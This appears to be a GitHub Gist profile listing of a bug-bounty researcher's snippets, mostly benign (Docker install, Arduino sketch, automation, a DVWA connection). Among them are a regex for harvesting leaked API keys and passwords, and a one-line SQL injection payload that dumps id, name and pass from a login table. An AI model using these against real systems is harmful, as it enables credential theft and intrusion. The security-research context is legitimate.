This is a simple guide to perform javascript recon in the bugbounty
- The first step is to collect possibly several javascript files (
more files=more paths,parameters->more vulns)
Md Saikat 0xh7ml
CAP | eJPTv2 | Security Researcher | Software Engineering | DevOps Enthusiast
0xh7ml
/ reqbin.html
Created
August 20, 2025 06:38
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html lang="en"> | |
| <head> | |
| <meta charset="UTF-8"> | |
| <title>ReqBin UI</title> | |
| <link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel="stylesheet"> | |
| </head> | |
| <body class="bg-light"> | |
| <div class="container py-4"> |
0xh7ml
/ JavascriptRecon.md
Created
February 10, 2025 20:10
— forked from fuckup1337/JavascriptRecon.md
My Javascript Recon Process - BugBounty
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sudo apt -y install default-libmysqlclient-dev build-essential pkg-config |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import pyautogui | |
| import time | |
| import csv | |
| # Open the CSV file | |
| with open('sample.csv', 'r', newline='') as file: | |
| r = csv.reader(file) | |
| # Prompt before starting the process (only once) | |
| pyautogui.alert('Click OK to start the process.') |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Define the pins for the PIR sensor and the buzzer | |
| const int pirPin = 2; // PIR sensor output pin | |
| const int buzzerPin = 8; // Buzzer pin | |
| void setup() { | |
| pinMode(pirPin, INPUT); // Set PIR sensor pin as input | |
| pinMode(buzzerPin, OUTPUT); // Set buzzer pin as output | |
| Serial.begin(9600); // Initialize serial communication at 9600 bps | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| // | |
| $server = 'localhost'; | |
| $user = 'root'; | |
| $pass = ''; | |
| $db = 'db_dvwa'; | |
| // server_name, user_name, password, database name | |
| $cursor = mysqli_connect($server, $user,$pass, $db ); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| echo "Installing Docker" | |
| sudo apt update | |
| sudo apt install apt-transport-https ca-certificates curl software-properties-common | |
| curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg | |
| echo "deb [arch=amd64 signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null | |
| sudo apt update | |
| sudo apt install docker-ce docker-ce-cli containerd.io | |
| sudo systemctl start docker | |
| sudo systemctl enable docker |
0xh7ml
/ Generic keys
Created
May 1, 2023 07:01
— forked from h4x0r-dz/Generic keys
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(login)WHERE(@x)IN(@x:=CONCAT(0x20,@x,id,0x3a3a,name,0x3a3a,pass,0x3c62723e))))x) |
0xh7ml
/ wordlist_from_js.sh
Created
November 23, 2021 10:08
— forked from seqrity/wordlist_from_js.sh
Make wordlist from js files
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /bin/bash | |
| ## This script fetch js files from a domain name and make a wordlist by words in js files | |
| ## Credit: https://gist.github.com/aufzayed/6cabed910c081cc2f2186cd27b80f687 | |
| ##### Install requirements ##### | |
| ##### Before running this script you should install Go ##### | |
| ## Install subjs (https://github.com/lc/subjs) | |
| GO111MODULE=on go get -u -v github.com/lc/subjs |
NewerOlder